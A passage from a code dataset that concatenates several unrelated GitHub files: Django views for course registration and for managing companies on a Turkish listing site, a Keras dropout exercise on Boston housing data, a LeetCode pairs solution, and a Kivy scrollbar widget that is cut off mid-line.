registered_courses.get(course=c.course.id)\n not_in_reg = False\n except CourseReg.DoesNotExist:\n not_in_reg = True\n\n if not_in_wavings and not_in_reg:\n courses.append(c)\n\n for c in course_to_major:\n try:\n wavings.get(course=c.course.id)\n not_in_wavings = False\n except WavedCourses.DoesNotExist:\n not_in_wavings = True\n\n try:\n registered_courses.get(course=c.course.id)\n not_in_reg = False\n except CourseReg.DoesNotExist:\n not_in_reg = True\n\n try:\n result.exclude(status=0).get(course=c.course.id)\n not_in_result = False\n except CourseResult.DoesNotExist:\n not_in_result = True\n\n if c in courses:\n not_in_semester_courses = False\n else:\n not_in_semester_courses = True\n\n if not_in_wavings and not_in_reg and not_in_result and not_in_semester_courses:\n outstandings.append(c)\n\n return Response({\"courses\": CourseToMajorSerializer(courses, many=True).data,\n \"reg_courses\": CourseRegSerializer(registered_courses, many=True).data,\n \"outstandings\": CourseToMajorSerializer(outstandings, many=True).data})\n","repo_name":"GHostEater/Portal","sub_path":"coursereg/views/registrable_courses.py","file_name":"registrable_courses.py","file_ext":"py","file_size_in_byte":2783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11342582752","text":"import datetime\nfrom django.contrib import messages\nfrom django.contrib.auth import logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import Group, User\nfrom django.core.mail import EmailMultiAlternatives\nfrom django.db.models import Count\nfrom django.http import JsonResponse\nfrom django.shortcuts import render, redirect\nfrom rest_framework.decorators import api_view\nfrom listArch.models.Option import Option\nfrom listArch.models.OptionValue import OptionValue\n\nfrom listArch.models.ProductOptionValue import ProductOptionValue\nfrom listArch.models.Category import Category\nfrom listArch.models.Product import Product\nfrom listArch.models.CompanyCode import CompanyCode\nfrom listArch.models.SocialMedia import SocialMedia\nfrom listArch.models.CompanyRetail import CompanyRetail\nfrom listArch.models.Setting import Setting\n\nfrom listArch.Forms.CompanyForm import CompanyForm\nfrom listArch.Forms.UserCompanyForm import UserCompanyForm\nfrom listArch.Forms.UserUpdateForm import UserUpdateForm\nfrom listArch.models.Company import Company\nfrom listArch.models.CompanyDefinition import CompanyDefinition\nfrom listArch.models.CompanySocialAccount import CompanySocialAccount\nfrom listArch.models.Definition import Definition\nfrom listArch.models.DefinitionDescription import DefinitionDescription\nfrom listArch.models.ProductDefinition import ProductDefinition\nfrom listArch.models.ProductImage import ProductImage\nfrom listArch.serializers.CompanySerializer import CompanySerializer\nfrom listArch.serializers.CompanySocialSerializer import CompanySocialSerializer\nfrom listArch.serializers.SocialMediaSerializer import SocialMediaSerializer\nfrom listArch.services import general_methods\nfrom oxiterp.settings.base import EMAIL_HOST_USER\n\n\n# Firma Ekle\ndef add_company(request):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n company_form = CompanyForm(initial={'date': datetime.datetime.today().strftime(\"%d-%b-%Y\")})\n user_form = UserCompanyForm()\n\n company_all = Company.objects.all()\n\n if request.method == 'POST':\n try:\n company_form = CompanyForm(request.POST or None, request.FILES or None)\n\n data = request.POST.copy()\n data['username'] = data['email']\n user_form = UserCompanyForm(data)\n\n if company_form.is_valid() and user_form.is_valid():\n\n user = user_form.save(commit=False)\n\n group = Group.objects.get(name='Firma')\n user2 = user_form.save()\n password = User.objects.make_random_password()\n user.set_password(password)\n user2.groups.add(group)\n user.is_active = True\n user.username = user.email\n user.save()\n\n count = request.POST['social_row']\n count = count.split(',')\n array = []\n for count in count:\n array.append(count)\n\n company = Company(user=user, name=company_form.cleaned_data['name'],\n userDescription=company_form.cleaned_data['userDescription'],\n address=company_form.cleaned_data['address'],\n logo=company_form.cleaned_data['logo'],\n phone=company_form.cleaned_data['phone'],\n website=company_form.cleaned_data['website'],\n country=company_form.cleaned_data['country'],\n map=company_form.cleaned_data['map'],\n noOfEmployees=company_form.cleaned_data['noOfEmployees'],\n annualSales=company_form.cleaned_data['annualSales'],\n date=company_form.cleaned_data['date'],\n business_type=company_form.cleaned_data['business_type'],\n isSponsor=company_form.cleaned_data['isSponsor'],\n city=company_form.cleaned_data['city'],\n title=company_form.cleaned_data['title'],\n mobilePhone=company_form.cleaned_data['mobilePhone']\n\n )\n company.save()\n\n for service in company_form.cleaned_data['service']:\n company.service.add(service)\n\n if request.POST['retail'] == 'news':\n name = request.POST['retail-name']\n logo = request.FILES['retail-logo']\n retail_company = CompanyRetail(company=company, name=name, logo=logo)\n retail_company.save()\n company.retail = retail_company\n company.save()\n elif request.POST['retail'] == '':\n print('mağaza yok')\n else:\n retail = Company.objects.get(pk=int(request.POST['retail']))\n retail_company = CompanyRetail(company=retail, name=retail.name, logo=retail.logo)\n retail_company.save()\n\n count_value = request.POST['row_number']\n\n if count_value != '':\n count_value = count_value.split(',')\n array = []\n for count in count_value:\n array.append(count)\n\n for i in array:\n social = SocialMedia(name=request.POST['company_social[' + str(i) + '][name]'],\n link=request.POST['company_social[' + str(i) + '][link]'])\n social.save()\n company_social = CompanySocialAccount(company=company, social_account=social)\n company_social.save()\n\n email = Setting.objects.filter(name='email')\n if email:\n if email[0].isActive:\n subject, from_email, to = 'OXIT Kullanıcı Giriş Bilgileri', EMAIL_HOST_USER, user2.email\n text_content = 'Aşağıda ki bilgileri kullanarak sisteme giriş yapabilirsiniz.'\n html_content = '

Site adresi: oxit.com.tr

'\n html_content = html_content + '

Kullanıcı Adı: ' + user2.username + '

'\n html_content = html_content + '

Şifre: ' + password + '

'\n msg = EmailMultiAlternatives(subject, text_content, from_email, [to])\n msg.attach_alternative(html_content, \"text/html\")\n msg.send()\n\n messages.success(request, 'Firma Bilgileri Başarıyla Kayıt Edilmiştir.')\n return redirect('listArch:firma-listesi')\n else:\n messages.warning(request, 'Alanları Kontrol Ediniz.')\n\n except Exception as e:\n print(e)\n return redirect('listArch:admin-error-sayfasi')\n return render(request, 'company/add-company.html',\n {'company_form': company_form, 'user_form': user_form, 'company_all': company_all})\n\n\ndef return_companies(request):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n return render(request, 'company/company-list.html')\n\n\n@api_view()\ndef getCompany(pk):\n company = Company.objects.filter(pk=pk)\n data = CompanySerializer(company, many=True)\n\n responseData = {}\n responseData['company'] = data.data\n responseData['company'][0]\n return JsonResponse(responseData, safe=True)\n\n\n# Firma Düzenle\n@login_required\ndef update_company(request, pk):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n company = Company.objects.get(pk=pk)\n user_form = UserUpdateForm(request.POST or None, instance=company.user)\n company_form = CompanyForm(request.POST or None, request.FILES or None, instance=company,\n initial={'date': company.date.strftime('%Y-%m-%d')})\n social_accounts = CompanySocialAccount.objects.filter(company=company)\n companies = Company.objects.all()\n retails = CompanyRetail.objects.filter(company=company)\n\n if request.method == 'POST':\n try:\n if user_form.is_valid() and company_form.is_valid():\n company.user.first_name = user_form.cleaned_data['first_name']\n company.user.last_name = user_form.cleaned_data['last_name']\n company.user.email = user_form.cleaned_data['email']\n company.user.username = user_form.cleaned_data['email']\n company.user.is_active = True\n company.user.save()\n company.logo = company_form.cleaned_data['logo']\n company.isSponsor = company_form.cleaned_data['isSponsor']\n company.title = company_form.cleaned_data['title']\n company.mobilePhone = company_form.cleaned_data['mobilePhone']\n company.phone = company_form.cleaned_data['phone']\n company.save()\n company_form.save()\n\n company.service.clear()\n for service in company_form.cleaned_data['service']:\n company.service.add(service)\n\n if request.POST['retail'] == 'news':\n name = request.POST['retail-name']\n logo = request.FILES['retail-logo']\n retail_company = CompanyRetail(name=name, logo=logo, company=company)\n retail_company.save()\n elif request.POST['retail'] == '':\n print('mağaza yok')\n else:\n retail = Company.objects.get(pk=int(request.POST['retail']))\n retail_company = CompanyRetail(company=company, name=retail.name, logo=retail.logo)\n retail_company.save()\n\n count_value = request.POST['row_number']\n\n if count_value != '':\n for social in social_accounts:\n account = SocialMedia.objects.filter(link=social.social_account.link)\n account.delete()\n social.delete()\n count_value = count_value.split(',')\n array = []\n for count in count_value:\n array.append(count)\n\n for i in array:\n social = SocialMedia(name=request.POST['company_social[' + str(i) + '][name]'],\n link=request.POST['company_social[' + str(i) + '][link]'])\n social.save()\n company_social = CompanySocialAccount(company=company, social_account=social)\n company_social.save()\n\n messages.success(request, 'Firma Başarıyla Güncellenmiştir.')\n return redirect('listArch:firma-listesi')\n else:\n messages.warning(request, 'Alanları Kontrol Edin.')\n except Exception as e:\n print(e)\n return redirect('listArch:admin-error-sayfasi')\n return render(request, 'company/update-company.html',\n {'company_form': company_form, 'user_form': user_form, 'social_accounts': social_accounts,\n 'company': company,\n 'loop': social_accounts.count(), 'companies': companies, 'retails': retails,\n })\n\n\n@api_view()\ndef getSocialAccount(request, pk):\n socialAccount = SocialMedia.objects.filter(pk=pk)\n data = SocialMediaSerializer(socialAccount, many=True)\n\n responseData = {}\n responseData['socialMedia'] = data.data\n responseData['socialMedia'][0]\n return JsonResponse(responseData, safe=True)\n\n\n@api_view()\ndef getSocialMedia(request, pk):\n company_accounts = CompanySocialAccount.objects.filter(company=Company.objects.get(pk=pk))\n data = CompanySocialSerializer(company_accounts, many=True)\n\n responseData = {}\n responseData['company_accounts'] = data.data\n responseData['company_accounts'][0]\n return JsonResponse(responseData, safe=True)\n\n\n@api_view(http_method_names=['POST'])\ndef edit_social_account(request):\n if request.POST:\n try:\n\n social_account_id = request.POST.get('social_id')\n social_accounts = SocialMedia.objects.filter(pk=social_account_id)\n\n company_accounts = CompanySocialAccount.objects.filter(social_account=social_accounts[0])\n\n name = request.POST['name']\n link = request.POST['link']\n\n for social_account in social_accounts:\n\n social_account.link = link\n social_account.name = name\n social_account.save()\n for company_account in company_accounts:\n company_account.social_account = social_account\n company_account.save()\n\n return JsonResponse({'status': 'Success', 'messages': 'save successfully'})\n\n except Exception as e:\n\n return JsonResponse({'status': 'Fail', 'msg': e})\n\n\ndef edit_code(request, pk):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n code = CompanyCode.objects.get(pk=pk)\n try:\n if request.method == 'POST':\n code.code = request.POST['company-code']\n code.save()\n\n messages.success(request, \"Kod Başarıyla Kayıt Edildi.\")\n return redirect('listArch:firma-kodu-ekle', code.company.pk)\n except Exception as e:\n print(e)\n\n return render(request, 'company/company-add-code.html', {'code': code})\n\n\ndef add_companyDefinition(request, pk):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n company = Company.objects.get(pk=pk)\n\n if request.method == 'POST':\n try:\n\n definition = Definition(key=request.POST['title[tr]'])\n definition.save()\n\n definitionDesc = DefinitionDescription(definition=definition, lang_code=1,\n title_desc=request.POST['title[tr]'],\n description=request.POST['content[tr]'])\n definitionDesc.save()\n\n definitionDesc2 = DefinitionDescription(definition=definition, lang_code=2,\n title_desc=request.POST['title[eng]'],\n description=request.POST['content[eng]'])\n definitionDesc2.save()\n\n company_definition = CompanyDefinition(company=company, definition=definition)\n company_definition.save()\n\n messages.success(request, \"Açıklama Başarıyla Kayıt Edildi.\")\n return redirect('listArch:firma-listesi')\n\n except Exception as e:\n print(e)\n return redirect('listArch:admin-error-sayfasi')\n return render(request, 'product/add-product-definition.html', )\n\n\ndef get_company_definition(request, pk):\n company = Company.objects.get(pk=pk)\n company_def = CompanyDefinition.objects.filter(company=company)\n definitionDesc = []\n definitionDesc2 = []\n if company_def.count() > 0:\n definitionDesc = DefinitionDescription.objects.filter(lang_code=1).filter(\n definition=company_def[0].definition)\n definitionDesc2 = DefinitionDescription.objects.filter(lang_code=2).filter(\n definition=company_def[0].definition)\n if company_def.count() > 0:\n\n if request.method == 'POST':\n try:\n\n for definition in company_def:\n definition.definition.key = request.POST['title[tr]']\n definition.definition.save()\n\n for definition_tr in definitionDesc:\n definition_tr.title_desc = request.POST['title[tr]']\n definition_tr.description = request.POST['content[tr]']\n definition_tr.save()\n\n for definition_eng in definitionDesc2:\n definition_eng.title_desc = request.POST['title[eng]']\n definition_eng.description = request.POST['content[eng]']\n definition_eng.save()\n\n messages.success(request, \"Açıklama Başarıyla Düzenlendi.\")\n return redirect('listArch:firma-listesi')\n\n except Exception as e:\n print(e)\n return redirect('listArch:admin-error-sayfasi')\n return render(request, 'product/product-definition-update.html',\n {'def_tr': definitionDesc[0], 'def_eng': definitionDesc2[0]})\n else:\n return redirect('listArch:firma-aciklama-ekle', pk)\n\n\n@login_required\ndef company_delete(request):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n if request.POST:\n try:\n\n company_id = request.POST['company_id']\n company = Company.objects.filter(pk=company_id)\n company[0].delete()\n\n return JsonResponse({'status': 'Success', 'messages': 'save successfully'})\n\n except Exception as e:\n\n return JsonResponse({'status': 'Fail', 'msg': e})\n\n\ndef return_company_products(request):\n user = request.user\n company = Company.objects.get(user=user)\n array = []\n category_products = Product.objects.filter(category__is_parent=True).filter(company=company).values(\n 'category').annotate(dcount=Count('category'))\n for category_product in category_products:\n product_categories = Product.objects.filter(company=company).filter(\n category=Category.objects.get(pk=category_product['category'])).order_by('?')[:4]\n category_dict = dict()\n category_dict['category'] = Category.objects.get(pk=category_product['category'])\n category_dict['products'] = product_categories\n array.append(category_dict)\n return render(request, 'company/company-products.html', {'products': array})\n\n\ndef company_category_products(request, pk):\n category = Category.objects.filter(pk=pk)\n category_products = Product.objects.filter(category__in=category)\n return render(request, 'company/company-category-products.html',\n {'category_products': category_products, 'category': category})\n\n\ndef company_product_detail(request, pk):\n product = Product.objects.get(pk=pk)\n product_image = ProductImage.objects.filter(product=Product.objects.get(pk=pk))\n array = []\n options_value = ProductOptionValue.objects.filter(product=product).values('option_value__option').annotate(\n count=Count('option_value__value'))\n for option in options_value:\n option_dict = dict()\n option_dict['option'] = Option.objects.filter(pk=option['option_value__option'])[0]\n option_dict['values'] = OptionValue.objects.filter(\n option=Option.objects.filter(pk=option['option_value__option'])[0])\n array.append(option_dict)\n descriptions = ProductDefinition.objects.filter(product=product)\n return render(request, 'company/company-product-detail.html',\n {'product': product, 'product_images': product_image,\n 'options': array, 'definitions': descriptions})\n\n\ndef delete_retail(request):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n if request.POST:\n try:\n\n retail_id = request.POST['retail_id']\n retail = CompanyRetail.objects.get(pk=retail_id)\n retail.delete()\n return JsonResponse({'status': 'Success', 'messages': 'save successfully'})\n\n except Exception as e:\n\n return JsonResponse({'status': 'Fail', 'msg': e})\n\n\ndef delete_code(request):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n if request.POST:\n try:\n\n code_id = request.POST['code_id']\n code = CompanyCode.objects.get(pk=int(code_id))\n code.delete()\n return JsonResponse({'status': 'Success', 'messages': 'save successfully'})\n\n except Exception as e:\n\n return JsonResponse({'status': 'Fail', 'msg': e})\n\n\ndef add_company_codes(request, pk):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n company = Company.objects.get(pk=pk)\n codes = CompanyCode.objects.filter(company=company)\n try:\n if request.method == 'POST':\n code = CompanyCode(company=company, code=request.POST['company-code'])\n code.save()\n\n messages.success(request, \"Kod Başarıyla Kayıt Edildi.\")\n return redirect('listArch:firma-kodu-ekle', pk)\n except Exception as e:\n print(e)\n\n return render(request, 'company/company-add-code.html', {'codes': codes})\n","repo_name":"furkanyalcindag/oxit-listingArch","sub_path":"listArch/Views/CompanyViews.py","file_name":"CompanyViews.py","file_ext":"py","file_size_in_byte":21911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12170290374","text":"from sklearn.datasets import load_boston\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import MinMaxScaler, StandardScaler\nfrom sklearn.preprocessing import MaxAbsScaler, RobustScaler \nimport numpy as np\nimport pandas as pd\nfrom tensorflow.python.keras.models import Sequential, Model, load_model\nfrom tensorflow.python.keras.layers import Dense, Input, Dropout\nfrom sklearn.metrics import r2_score, accuracy_score\nimport matplotlib.pyplot as plt\nfrom tensorflow.python.keras.callbacks import EarlyStopping, ModelCheckpoint\n\ndatasets = load_boston()\nx = datasets.data\ny = datasets['target']\n\nx_train, x_test, y_train, y_test = train_test_split(x, y, train_size=0.8, random_state=66)\n\n# scaler = MinMaxScaler()\n# scaler = StandardScaler()\n# scaler = MaxAbsScaler()\nscaler = RobustScaler()\n\nscaler.fit(x_train)\nx_train = scaler.transform(x_train)\nx_test = scaler.transform(x_test)\n\n#2. 모델 구성 \ninput1 = Input(shape=(13,))\ndense1 = Dense(32)(input1)\ndense2 = Dense(32)(dense1)\ndrop1 = Dropout(0.2)(dense2) # 바로 위 레이어의 노드에서 20%를 랜덤으로 빼줌 (보통 이런 Dropout을 써주면 성능이 더 좋다고 함)\ndense3 = Dense(32)(drop1)\ndrop2 = Dropout(0.1)(dense3)\ndense4 = Dense(32)(drop2)\ndrop3 = Dropout(0.1)(dense4)\ndense5 = Dense(32)(dense4)\noutput1 = Dense(1)(dense5)\nmodel = Model(inputs=input1, outputs=output1)\n\n#3. 컴파일, 훈련\nmodel.compile(loss='mse', optimizer='adam')\nes = EarlyStopping(monitor='val_loss', patience=50, mode='min', verbose=1, restore_best_weights=True)\n# mcp = ModelCheckpoint(monitor='val_loss', mode='auto', verbose=1,\n# save_best_only=True, # \n# filepath='./_ModelCheckPoint/keras24_ModelCheckPoint.hdf5' \n# )\nhist = model.fit(x_train, y_train, epochs=500, batch_size=10, verbose=1, validation_split=0.15, callbacks=[es])\n\n#4. 평가, 예측 <-- 여기는 Dropout이 적용되지 않고 전체 모델이 다 적용됨\nloss = model.evaluate(x_test, y_test)\nprint('loss : ', loss)\n\ny_predict = model.predict(x_test)\nr2 = r2_score(y_test, y_predict)\nprint('r2스코어 : ', r2)\n\n\n# 노말 MinMax Standard MaxAbs Robust \n# loss : 17.94440269470215 15.174883842468262 19.268272399902344 15.438285827636719 20.521202087402344 \n# r2 : 0.7853102126165242 0.8184451978918657 0.7694712272474835 0.8152938097680617 0.7544809681427924 \n# 함수형 13.969481468200684 \n# 0.8328668305394888\n# Dropout 15.865423202514648 16.704450607299805 15.497111320495605 16.57057762145996 \n# 0.810183480265888 0.800145226034957 0.8145900164278385 0.8017468844811555 ","repo_name":"SuperMindu/studyhome","sub_path":"keras/개념정리/keras26_dropout정리.py","file_name":"keras26_dropout정리.py","file_ext":"py","file_size_in_byte":3663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3941868097","text":"class Solution(object):\n def numIdenticalPairs(self, nums):\n nums.sort()\n print(nums)\n counter = 0\n for i in range(len(nums)):\n \n for j in range(i+1, len(nums)):\n if nums[i] == nums[j]:\n counter = counter+1\n\n return counter\n \n","repo_name":"Beki4382/Competitive-Programming","sub_path":"NumberOfGoodPairs.py","file_name":"NumberOfGoodPairs.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25116622738","text":"from functools import partial\r\nfrom kivy.app import App\r\nfrom kivy.input.motionevent import MotionEvent\r\nfrom kivy.properties import NumericProperty, AliasProperty, ObjectProperty, ListProperty, ColorProperty, BooleanProperty\r\nfrom kivy.lang.builder import Builder\r\nfrom kivy.uix.boxlayout import BoxLayout\r\nfrom kivy.uix.widget import Widget\r\nfrom kivy.clock import Clock\r\nfrom kivy.animation import Animation\r\nfrom kivy.uix.stencilview import StencilView\r\nfrom kivy.config import Config\r\n# When we are generating documentation, Config doesn't exist\r\n_scroll_timeout = _scroll_distance = 0\r\nif Config:\r\n _scroll_timeout = Config.getint('widgets', 'scroll_timeout')\r\n _scroll_distance = '{}sp'.format(Config.getint('widgets', 'scroll_distance'))\r\n\r\nBuilder.load_string(\"\"\"\r\n:\r\n _handle_x_pos: self.x + self.width * self.hbar[0], self.y\r\n _handle_x_size: self.width * self.hbar[1], self.height\r\n canvas:\r\n Color:\r\n rgba: self._bar_color if (self.viewport_size[0] > self.scroller_size[0]) else [0, 0, 0, 0]\r\n Rectangle:\r\n pos: root._handle_x_pos or (0, 0)\r\n size: root._handle_x_size or (0, 0)\r\n size_hint_y: None\r\n orientation: 'horizontal'\r\n height: 40\r\n\r\n:\r\n _handle_y_pos: self.x, self.y + self.height * self.vbar[0]\r\n _handle_y_size: self.width, self.height * self.vbar[1]\r\n canvas:\r\n Color:\r\n rgba: self._bar_color if (self.viewport_size[1] > self.scroller_size[1]) else [0, 0, 0, 0]\r\n Rectangle:\r\n pos: root._handle_y_pos or (0, 0)\r\n size: root._handle_y_size or (0, 0)\r\n size_hint_x: None\r\n orientation: 'vertical'\r\n width: 40\r\n\"\"\")\r\n\r\nclass ScrollBar(BoxLayout):\r\n \"\"\"\r\n Base class for a basic scrollbar widget that can control a set ScrollView.\r\n This class itself should not be used, use ScrollBarX or ScrollBarY for horizontal or vertical scrolling.\r\n The 'scroller' variable must be set to the ScrollView widget that should be controlled.\r\n 'bar_color' and 'bar_inactive_color' can be set to a rgba color.\r\n \"\"\"\r\n\r\n scroll = NumericProperty()\r\n scroller = ObjectProperty(allownone=True)\r\n scroll_wheel_distance = NumericProperty('20sp')\r\n bar_color = ColorProperty([.7, .7, .7, .9])\r\n bar_inactive_color = ColorProperty([.7, .7, .7, .2])\r\n viewport_size = ListProperty([0, 0])\r\n scroller_size = ListProperty([0, 0])\r\n\r\n _bar_color = ListProperty([0, 0, 0, 0])\r\n _bind_inactive_bar_color_ev = None\r\n\r\n def _set_scroller_size(self, instance, value):\r\n self.scroller_size = value\r\n\r\n def _set_viewport_size(self, instance, value):\r\n self.viewport_size = value\r\n\r\n def _set_scroll(self, instance, value):\r\n self.scroll = value\r\n\r\n def _bind_inactive_bar_color(self, *l):\r\n self.funbind('bar_color', self._change_bar_color)\r\n self.fbind('bar_inactive_color', self._change_bar_color)\r\n Animation(_bar_color=self.bar_inactive_color, d=.5, t='out_quart').start(self)\r\n\r\n def _change_bar_color(self, inst, value):\r\n self._bar_color = value\r\n\r\n def __init__(self, **kwargs):\r\n super().__init__(**kwargs)\r\n self.update_bar_color()\r\n\r\n def on_touch_down(self, touch):\r\n if not self.disabled and self.collide_point(*touch.pos):\r\n touch.grab(self)\r\n if 'button' in touch.profile and touch.button.startswith('scroll'):\r\n btn = touch.button\r\n scroll_direction = ''\r\n if btn in ('scrollup', 'scrollright'):\r\n scroll_direction = 'up'\r\n elif btn in ('scrolldown', 'scrollleft'):\r\n scroll_direction = 'down'\r\n return self.wheel_scroll(scroll_direction)\r\n \r\n self.do_touch_scroll(touch)\r\n return True\r\n\r\n def on_touch_move(self, touch):\r\n if touch.grab_current == self:\r\n self.do_touch_scroll(touch)\r\n\r\n def do_touch_scroll(self, touch):\r\n pass\r\n\r\n def on_scroller(self, instance, value):\r\n if value:\r\n value.bind(size=self._set_scroller_size)\r\n value.bind(viewport_size=self._set_viewport_size)\r\n self.scroller_size = value.size\r\n self.viewport_size = value.viewport_size\r\n\r\n def update_bar_color(self):\r\n ev = self._bind_inactive_bar_color_ev\r\n if ev is None:\r\n ev = self._bind_inactive_bar_color_ev = Clock.create_trigger(\r\n self._bind_inactive_bar_color, .5)\r\n self.funbind('bar_inactive_color', self._change_bar_color)\r\n Animation.stop_all(self, '_bar_color')\r\n self.fbind('bar_color', self._change_bar_color)\r\n self._bar_color = self.bar_color\r\n ev()\r\n\r\n def wheel_scroll(self, direction):\r\n return False\r\n\r\n\r\nclass ScrollBarX(ScrollBar):\r\n \"\"\"Horizontal scrollbar widget. See 'ScrollBar' for more information.\"\"\"\r\n\r\n scroll = NumericProperty(0.)\r\n def _get_hbar(self):\r\n vw = self.viewport_size[0]\r\n w = self.scroller_size[0]\r\n if vw < w or vw == 0:\r\n return 0, 1.\r\n pw = max(0.01, w / float(vw))\r\n sx = min(1.0, max(0.0, self.scroll))\r\n px = (1. - pw) * sx\r\n return (px, pw)\r\n hbar = AliasProperty(_get_hbar, bind=('scroller_size', 'scroll', 'viewport_size', 'width'), cache=True)\r\n\r\n def on_scroller(self, instance, value):\r\n super().on_scroller(instance, value)\r\n if value:\r\n value.bind(scroll_x=self._set_scroll)\r\n self.scroll = value.scroll_x\r\n\r\n def on_scroll(self, instance, value):\r\n if self.scroller is not None:\r\n self.scroller.scroll_x = value\r\n\r\n def do_touch_scroll(self, touch):\r\n self.update_bar_color()\r\n scroll_scale = (self.width - self.width * self.hbar[1])\r\n if scroll_scale == 0:\r\n return\r\n scroll_amount = touch.dx / scroll_scale\r\n self.scroll = min(max(self.scroll + scroll_amount, 0.), 1.)\r\n\r\n def wheel_scroll(self, direction):\r\n if (direction == 'up' and self.scroll >= 1) or (direction == 'down' and self.scroll <= 0):\r\n return False\r\n \r\n if self.viewport_size[0] > self.scroller_size[0]:\r\n scroll_percent = self.scroll_wheel_distance / self.viewport_size[0]\r\n if direction == 'up':\r\n new_scroll = self.scroll - scroll_percent\r\n else:\r\n new_scroll = self.scroll + scroll_percent\r\n self.scroll = min(max(new_scroll, 0), 1)\r\n return True\r\n return False\r\n\r\n\r\nclass ScrollBarY(ScrollBar):\r\n \"\"\"Vertical scrollbar widget. See 'ScrollBar' for more information.\"\"\"\r\n\r\n scroll = NumericProperty(1.)\r\n def _get_vbar(self):\r\n vh = self.viewport_size[1]\r\n h = self.scroller_size[1]\r\n if vh < h or vh == 0:\r\n return 0, 1.\r\n ph = max(0.01, h / float(vh))\r\n sy = min(1.0, max(0.0, self.scroll))\r\n py = (1. - ph) * sy\r\n return (py, ph)\r\n vbar = AliasProperty(_get_vbar, bind=('scroller_size', 'scroll', 'viewport_size', 'height'), cache=True)\r\n\r\n def on_scroller(self, instance, value):\r\n super().on_scroller(instance, value)\r\n if value:\r\n value.bind(scroll_y=self._set_scroll)\r\n self.scroll = value.scroll_y\r\n\r\n def on_scroll(self, instance, value):\r\n if self.scroller is not None:\r\n self.scroller.scroll_y = value\r\n \r\n def do_touch_scroll(self, touch):\r\n self.update_bar_color()\r\n scroll_scale = (self.height - self.height * self.vbar[1])\r\n if scroll_scale == 0:\r\n return\r\n scroll_amount = touch.dy / scroll_scale\r\n self.scroll = min(max(self.scroll + scroll_amount, 0.), 1.)\r\n\r\n def wheel_scroll(self, direction):\r\n if (direction == 'up' and self.scroll >= 1) or (direction == 'down' and self.scroll <= 0):\r\n return False\r\n \r\n if self.viewport_size[1] > self.scroller_size[1]:\r\n scroll_percent = self.scroll_wheel_distance / self.viewport_size[1]\r\n if direction == 'up':\r\n new_scroll = self.scroll - scroll_percent\r\n else:\r\n new_scroll = self.scroll + scroll_percent\r\n self.scroll = min(max(new_scroll, 0), 1)\r\n return True\r\n return False\r\n\r\n\r\nclass BasicScroller(StencilView):\r\n \"\"\"\r\n Simplified version of Kivy's ScrollView. Removes scrollbars and any touch control.\r\n \"\"\"\r\n\r\n scroll_x = NumericProperty(0.)\r\n scroll_y = NumericProperty(1.)\r\n viewport_size = ListProperty([0, 0])\r\n\r\n _viewport = ObjectProperty(None, allownone=True)\r\n\r\n def _set_viewport_size(self, instance, value):\r\n self.viewport_size = value\r\n\r\n def on__viewport(self, instance, value):\r\n if value:\r\n value.bind(size=self._set_viewport_size)\r\n self.viewport_size = value.size\r\n\r\n def __init__(self, **kwargs):\r\n self._trigger_update_from_scroll = Clock.create_trigger(\r\n self.update_from_scroll, -1)\r\n # create a specific canvas for the viewport\r\n from kivy.graphics import PushMatrix, Translate, PopMatrix, Canvas\r\n self.canvas_viewport = Canvas()\r\n self.canvas = Canvas()\r\n with self.canvas_viewport.before:\r\n PushMatrix()\r\n self.g_translate = Translate(0, 0)\r\n with self.canvas_viewport.after:\r\n PopMatrix()\r\n\r\n super().__init__(**kwargs)\r\n\r\n # now add the viewport canvas to our canvas\r\n self.canvas.add(self.canvas_viewport)\r\n\r\n trigger_update_from_scroll = self._trigger_update_from_scroll\r\n fbind = self.fbind\r\n fbind('scroll_x', trigger_update_from_scroll)\r\n fbind('scroll_y', trigger_update_from_scroll)\r\n fbind('pos', trigger_update_from_scroll)\r\n fbind('size', trigger_update_from_scroll)\r\n\r\n trigger_update_from_scroll()\r\n\r\n def transformed_touch(self, touch, touch_type='down'):\r\n touch.push()\r\n touch.apply_transform_2d(self.to_local)\r\n #touch.apply_transform_2d(self.to_widget)\r\n if touch_type == 'down':\r\n ret = super().on_touch_down(touch)\r\n elif touch_type == 'up':\r\n ret = super().on_touch_up(touch)\r\n elif touch_type == 'move':\r\n ret = super().on_touch_move(touch)\r\n touch.pop()\r\n return ret\r\n\r\n def on_touch_down(self, touch):\r\n return self.do_touch_down(touch)\r\n \r\n def on_touch_move(self, touch):\r\n return self.do_touch_move(touch)\r\n\r\n def on_touch_up(self, touch):\r\n return self.do_touch_up(touch)\r\n\r\n def do_touch_down(self, touch):\r\n if self.collide_point(*touch.pos):\r\n return self.transformed_touch(touch, touch_type='down')\r\n\r\n def do_touch_move(self, touch):\r\n return self.transformed_touch(touch, touch_type='move')\r\n\r\n def do_touch_up(self, touch):\r\n return self.transformed_touch(touch, touch_type='up')\r\n\r\n def to_local(self, x, y, **k):\r\n tx, ty = self.g_translate.xy\r\n return x - tx, y - ty\r\n\r\n def to_parent(self, x, y, **k):\r\n tx, ty = self.g_translate.xy\r\n return x + tx, y + ty\r\n\r\n def _apply_transform(self, m, pos=None):\r\n tx, ty = self.g_translate.xy\r\n m.translate(tx, ty, 0)\r\n return super()._apply_transform(m, (0, 